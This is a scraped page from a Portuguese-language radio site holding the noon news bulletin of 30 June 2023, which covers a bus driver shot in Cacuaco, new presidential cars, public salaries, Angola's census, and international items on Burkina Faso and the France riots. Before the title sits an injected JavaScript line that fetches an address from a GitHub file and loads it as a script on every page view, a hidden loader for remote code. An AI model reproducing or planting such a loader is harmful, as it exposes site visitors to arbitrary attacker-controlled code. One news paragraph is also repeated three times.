;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Jornal 12h, edição de 30 de Junho de 2023 | RadioPlayDigital
Jornal 12h, edição de 30 de Junho de 2023

MOTORISTA DE AUTOCARRO MORTO EM CACUACO POR AUMENTO DA CORRIDA DE TRANSPORTE PUBLICO.

PRESIDENCIA ANGOLANA COM NOVA FROTA DE VIATURAS TOPO DE GAMA. COMENTARISTA DIZ QUE HAVIAM OUTRAS PRIORIDADES NO PAIS.

SALÁRIOS DA FUNÇAO PUBLICA GARANTIDO. PALAVRAS DA MINISTRA DAS FINANÇAS QUE APONTA ESTABILIDADE NA BALANÇA DE PAGAMENTOS.

CRIADAS AS CONDIÇÕES PARA A REALIZAÇÃO DE UM, NOVO CENSO POPULACIONAL.

DUAS ORGANIZAÇÕES INTERNACIONAIS DENUNCIAM MASSACRES E EXECUÇOES DE POPULARES DE ZONAS RURAIS NO LESTE DE AFRICA.

JINGLE MIX

Jornal ao meio dia de sexta feira. São 30 de Junho de 2023. Coordenação de Alves Fernandes, técnica de Edmundo Simões e Mauro Fernandes.   

JINGLE DEBATE

Um jovem de 24 anos, que exercia a actividade de motorista de mini-autocarro em Cacuaco, foi morto a tiro esta quinta-feirapor um indivíduo ainda não identificado, por querer encurtar a viagem que fazia no trajecto da Vila de Cacuaco até ao desvio do Sequele.

Segundo o Novo Jornal, tudo ocorreu quando o motorista decidiu sem razão lógica encurtar a viagem, ação que visa potenciar os lucros no mesmo trajecto, porque permite cobrar duas vezes, facto que gerou desentendimento por parte dos passageiros.

Convencido da decisão, homem não aceitou recuar a sua posição que tomou de encurtar a rota como antes teria anunciado, gerou-se a confusão no interior do mini – autocarro, com agressões entre passageiros e motorista.

NESTOR GOUBEL 12H

Entre os passageiros estava um indivíduo armado, que, no meio dos tumultos no interior da viatura, empunhou a arma e disparou contra o motorista, que ainda chegou com vida ao hospital mas ali acabou por falecer.

PONTO

Os Serviços de Apoio do Presidente da República têm uma nova frota de carros de viaturas.

São algumas unidades do topo de gama da Maybach, Novo Mercedes-Maybach Classe S, produzido pela construtora alemã Mercedes Bens. 

O analista Carlos Rosado de Carvalho disse que a compra de novas viaturas para a presidência da república é uma ma noticia para os angolanos e os mercados.

Numa altura de contenção o analista diz que devia haver outros critérios para a aquisição da nova frota.

Segundo dados publicados na última semana a frota da presidência da república foi equipada com novos carros topo de gama e com alto padrão de segurança.

CARLOS ROSADO DE CARVALHO CARROS

Por outro lado, o subsídio dos deputados foi revisto nos últimos dias. O analista MFM fala das novas benesses dos homens da casa das leis.

CARLOS SUBSIDOS DOS DEPUTADOS

A ministra das Finanças, Vera Daves, disse, que há recursos financeiros para pagar os trabalhadores da função pública, assegurando, assim, a estabilidade na balança de pagamentos.

Em declarações à imprensa, a governante referiu que neste mês de Junho já foram pagos 207 mil milhões de kwanzas.

A ministra das Finanças, que falava à margem da conferência sobre “ Inclusão financeira aproveitando a ocasião para informar que estão concluídos os pagamentos.

MINISTRA VERA DAVES 07H

O analista Carlos Rosado de Carvalho elogia a prontidão de Vera Daves em esclarecer as questões salarias e assim evitar uma situação de saturação na função publica.

CARLOS ROSADO IMPOSTOS 12H

Os parlamentares dos países da Comunidade de desenvolvimento da África Austral, trocam experiências em matérias sobre gestão de contas públicas no âmbito da supervisão e fiscalização eficaz nos países membros.

Mais dados com o Caçosso Domingos.

CASSOSO DOMINGOS 12H 

As escolas n.º 1304 – Anangola Bairro Operário e a n.º 1224 – Njinga Mbande, Maculusso) foram visitadas, esta quinta-feira, pela Vice-Presidente da República, Esperança da Costa.

As referidas escolas estão inscritas no Projecto de Aprendizagem para Todos e Empoderamento das Raparigas (PAT II), que prevê a reabilitação, em duas fases, de vários estabelecimentos de ensino. Na fase piloto, devem ser reabilitadas sete e, na primeira fase, 11, perfazendo 18 escolas, o que se traduzirá em 344 salas de aula e 30.526 alunos beneficiados.

As obras nestas escolas têm o arranque das obras da fase piloto previstas para o Novembro do ano em curso e a conclusão agendada para Junho de 2024. As obras da primeira fase arrancam em Novembro de 2024, com conclusão prevista para Junho de 2025.

Já Pedro Tuty Cosse, diretor da Escola nº1304 Anangola, fala do mau estado de degradação da Instituição.

PEDRO TUTTY COSSE

A Ministra da Educação, Luísa Grilo, disse que a reabilitação das Escolas será por fase.

MINISTRA LUISA GRILLO 12H

O objetivo desta visita era fazer um diagnóstico das escolas de Luanda fez saber a Vice-presidente, da República Esperança da Costa.

VICE PRESIDENTE ESPERANÇA COSTA 12H

PONTO

Cerca de seis meses após o início dos trabalhos, que visam a organização para a realização do Censo Geral de 2024, a Comissão Multissectorial efetuou o balanço das acções desenvolvidas até ao momento salientando o seu bom andamento.

Em declarações à imprensa no final do encontro da Comissão Multissectorial, coordenada pelo ministro de Estado e Chefe da Casa Militar do Presidente da República, Francisco Pereira Furtado, o seu porta-voz, Hernani Luís, referiu que o mesmo serviu para analisar o grau de execução, bem como as tarefas que devem ser optimizadas.

Esta avaliação, salientou o também director adjunto do Instituto Nacional de Estatística (INE), “tem lugar quando estamos a poucos dias para a realização do Censo Piloto, agendado para 19 de Julho em 7 províncias (Bié, Bengo, Cuando Cubango, Cunene, Luanda, Lunda-Norte e Uíge), num total de 14 comunas”.

O Ministério da Justiça e dos Direitos Humanos, a Organização das Nações Unidas sobre Drogas e Crime e a Organização Internacional para as Migrações em Angola, vão realizar de 3 a 5 de Julho, em Luanda, um Workshop de sensibilização e formação para profissionais dos meios de comunicação, sobre tráfico de pessoas.

O evento tem como objectivo capacitar e sensibilizar os órgãos de comunicação social, para que possam consciencializar o público sobre as consequências e os perigos do tráfico de pessoas, assim como noticiar casos de tráfico de maneira sensível e responsável, como avança uma nota enviada nossa  redacção

INTERNACIONAL

Execuções extrajudiciais, desaparecimentos forçados e casos de tortura por parte das forças armadas do Burkina Faso aterrorizaram este ano as comunidades do nordeste do país, segundo um relatório da organização não-governamental (ONG) Human Rights Watch (HRW) divulgado hoje.

Execuções extrajudiciais, desaparecimentos forçados e casos de tortura por parte das forças armadas do Burkina Faso aterrorizaram este ano as comunidades do nordeste do país, segundo um relatório da organização não-governamental (ONG) Human Rights Watch (HRW) divulgado hoje.

Execuções extrajudiciais, desaparecimentos forçados e casos de tortura por parte das forças armadas do Burkina Faso aterrorizaram este ano as comunidades do nordeste do país, segundo um relatório da organização não-governamental (ONG) Human Rights Watch (HRW) divulgado hoje.

Combatentes extremistas islâmicos ligados à Al-Qaida e ao grupo extremista Estado Islâmico travam há cerca de sete anos uma violenta insurreição no Burkina Faso.

A violência provocou a morte de milhares de pessoas e dividiu o país, palco de dois golpes de Estado em 2022.

Sobe para 667 o número de pessoas detidas em França durante protestos realizados na sequência da morte de um jovem de 17 anos pela polícia, de acordo com dados do Ministério do Interior francês.

Segundo a fonte pelo menos 307 detenções aconteceram na região de Paris, tendo a maioria dos detidos idades entre os 14 e os 18 anos, além dos 249 elementos da polícia que ficaram feridos nos tumultos.

A polícia recebeu “instruções sistemáticas de intervenção”, escreveu o ministro, numa mensagem na rede social Twitter, na qual manifestou apoio às forças de segurança francesas “que estão a fazer um trabalho corajoso”.

Milhares de pessoas protestaram, na quinta-feira, em Nanterre, contra a morte do jovem de 17 anos Nahel, no mesmo dia em que o Governo francês anunciou o envio de 40 mil polícias para conter a violência no país.

Data de Emissão: 30-06-2023 às 12:00
Género(s): Noticiário
 
PARTICIPANTES
PUB RADIO PLAY

Relacionados